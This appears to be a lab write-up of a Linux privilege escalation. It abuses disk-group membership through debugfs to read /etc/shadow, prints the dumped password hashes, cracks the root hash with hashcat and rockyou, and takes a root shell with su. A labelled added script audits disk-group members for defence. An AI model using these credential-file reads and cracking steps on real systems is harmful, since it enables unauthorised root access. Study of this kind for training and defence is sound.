Disk Group
The dora user is a member of the disk group, which makes it a vector for privilege escalation: members of disk can access the raw block devices directly, bypassing file permissions.
dora@dora:~$ df -h
Filesystem Size Used Avail Use% Mounted on
udev 947M 0 947M 0% /dev
tmpfs 199M 1.2M 198M 1% /run
/dev/mapper/ubuntu--vg-ubuntu--lv 9.8G 5.1G 4.3G 55% /
tmpfs 992M 0 992M 0% /dev/shm
tmpfs 5.0M 0 5.0M 0% /run/lock
tmpfs 992M 0 992M 0% /sys/fs/cgroup
/dev/loop0 62M 62M 0 100% /snap/core20/1611
/dev/loop1 64M 64M 0 100% /snap/core20/1852
/dev/loop2 92M 92M 0 100% /snap/lxd/24061
/dev/loop3 68M 68M 0 100% /snap/lxd/22753
/dev/sda2 1.7G 209M 1.4G 13% /boot
/dev/loop4 50M 50M 0 100% /snap/snapd/18596
tmpfs 199M 0 199M 0% /run/user/1000
/dev/mapper/ubuntu--vg-ubuntu--lv is mounted to /
dora@dora:~$ debugfs /dev/mapper/ubuntu--vg-ubuntu--lv
debugfs 1.45.5 (07-Jan-2020)
debugfs: cd /root
debugfs: ls
131076 (12) . 2 (12) .. 265478 (12) .ssh 265574 (12) snap
131077 (16) .bashrc 131078 (16) .profile 142303 (24) .bash_history
265709 (16) .cache 265469 (36) .local 132363 (20) proof.txt
132531 (3908) flag4.txt
(END)
I can read any file on the target system
debugfs: cat /etc/shadow
root:$6$AIWcIr8PEVxEWgv1$3mFpTQAc9Kzp4BGUQ2sPYYFE/dygqhDiv2Yw.XcU.Q8n1YO05.a/4.D/x4ojQAkPnv/v7Qrw7Ici7.hs0sZiC.:19453:0:99999:7:::
daemon:*:19235:0:99999:7:::
bin:*:19235:0:99999:7:::
sys:*:19235:0:99999:7:::
sync:*:19235:0:99999:7:::
games:*:19235:0:99999:7:::
man:*:19235:0:99999:7:::
lp:*:19235:0:99999:7:::
mail:*:19235:0:99999:7:::
news:*:19235:0:99999:7:::
uucp:*:19235:0:99999:7:::
proxy:*:19235:0:99999:7:::
www-data:*:19235:0:99999:7:::
backup:*:19235:0:99999:7:::
list:*:19235:0:99999:7:::
irc:*:19235:0:99999:7:::
gnats:*:19235:0:99999:7:::
nobody:*:19235:0:99999:7:::
systemd-network:*:19235:0:99999:7:::
systemd-resolve:*:19235:0:99999:7:::
systemd-timesync:*:19235:0:99999:7:::
messagebus:*:19235:0:99999:7:::
syslog:*:19235:0:99999:7:::
_apt:*:19235:0:99999:7:::
tss:*:19235:0:99999:7:::
uuidd:*:19235:0:99999:7:::
tcpdump:*:19235:0:99999:7:::
landscape:*:19235:0:99999:7:::
pollinate:*:19235:0:99999:7:::
usbmux:*:19381:0:99999:7:::
sshd:*:19381:0:99999:7:::
systemd-coredump:!!:19381::::::
lxd:!:19381::::::
fwupd-refresh:*:19381:0:99999:7:::
dora:$6$PkzB/mtNayFM5eVp$b6LU19HBQaOqbTehc6/LEk8DC2NegpqftuDDAvOK20c6yf3dFo0esC0vOoNWHqvzF0aEb3jxk39sQ/S4vGoGm/:19453:0:99999:7:::
Including the /etc/shadow file
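A defensive check for the condition shown above, as an added example that is not part of the original write-up: it lists every non-root account that holds the disk group, either as a supplementary group in /etc/group or as its primary GID in /etc/passwd. The sample files and the imager account are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the write-up): report accounts holding the "disk" group.

# disk_group_members GROUP_FILE PASSWD_FILE [GROUP_NAME]
# Prints, sorted and de-duplicated, every account in the group.
disk_group_members() (
    group_file=$1; passwd_file=$2; name=${3:-disk}
    # Field 3 of the group's entry is its GID.
    gid=$(awk -F: -v g="$name" '$1 == g { print $3; exit }' "$group_file")
    [ -n "$gid" ] || exit 0
    {
        # Supplementary members: comma-separated field 4 of /etc/group.
        awk -F: -v g="$name" '$1 == g {
            n = split($4, m, ",")
            for (i = 1; i <= n; i++) if (m[i] != "") print m[i]
        }' "$group_file"
        # Accounts whose primary GID (field 4 of /etc/passwd) is the group.
        awk -F: -v gid="$gid" '$4 == gid { print $1 }' "$passwd_file"
    } | sort -u
)

# Same list minus root, i.e. the accounts that need review.
unexpected_disk_members() {
    disk_group_members "$@" | grep -vx root || true
}

# Constructed sample files; "imager" is a made-up account.
write_sample() {
    printf '%s\n' 'root:x:0:' 'disk:x:6:dora' 'dora:x:1000:' > "$1/group"
    printf '%s\n' 'root:x:0:0:root:/root:/bin/bash' \
        'dora:x:1000:1000::/home/dora:/bin/bash' \
        'imager:x:1001:6::/home/imager:/bin/sh' > "$1/passwd"
}

sample_dir=$(mktemp -d)
write_sample "$sample_dir"
unexpected_disk_members "$sample_dir/group" "$sample_dir/passwd"
rm -rf "$sample_dir"
```

On a live host, run it against /etc/group and /etc/passwd; accounts served from a directory service are not in those files.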
Password Cracking
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/extplorer]
└─$ hashcat --show root.hash
1800 | sha512crypt $6$, SHA512 (Unix) | Operating System
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/extplorer]
└─$ hashcat -a 0 -m 1800 root.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$6$AIWcIr8PEVxEWgv1$3mFpTQAc9Kzp4BGUQ2sPYYFE/dygqhDiv2Yw.XcU.Q8n1YO05.a/4.D/x4ojQAkPnv/v7Qrw7Ici7.hs0sZiC.:explorer
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1800 (sha512crypt $6$, SHA512 (Unix))
Hash.Target......: $6$AIWcIr8PEVxEWgv1$3mFpTQAc9Kzp4BGUQ2sPYYFE/dygqhD...0sZiC.
Time.Started.....: Wed Mar 26 11:41:18 2025 (1 sec)
Time.Estimated...: Wed Mar 26 11:41:19 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3416 H/s (6.90ms) @ Accel:128 Loops:1024 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 3200/14344385 (0.02%)
Rejected.........: 0/3200 (0.00%)
Restore.Point....: 3072/14344385 (0.02%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4096-5000
Candidate.Engine.: Device Generator
Candidates.#1....: adriano -> imissu
Hardware.Mon.#1..: Util: 72%
Started: Wed Mar 26 11:41:17 2025
Stopped: Wed Mar 26 11:41:21 2025
Password hash cracked for the root account: explorer
root
dora@dora:/$ su root
Password: explorer
root@dora:/# whoami
root
root@dora:/# hostname
dora
root@dora:/# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:ac:ea brd ff:ff:ff:ff:ff:ff
inet 192.168.111.16/24 brd 192.168.111.255 scope global ens160
valid_lft forever preferred_lft forever
System level compromise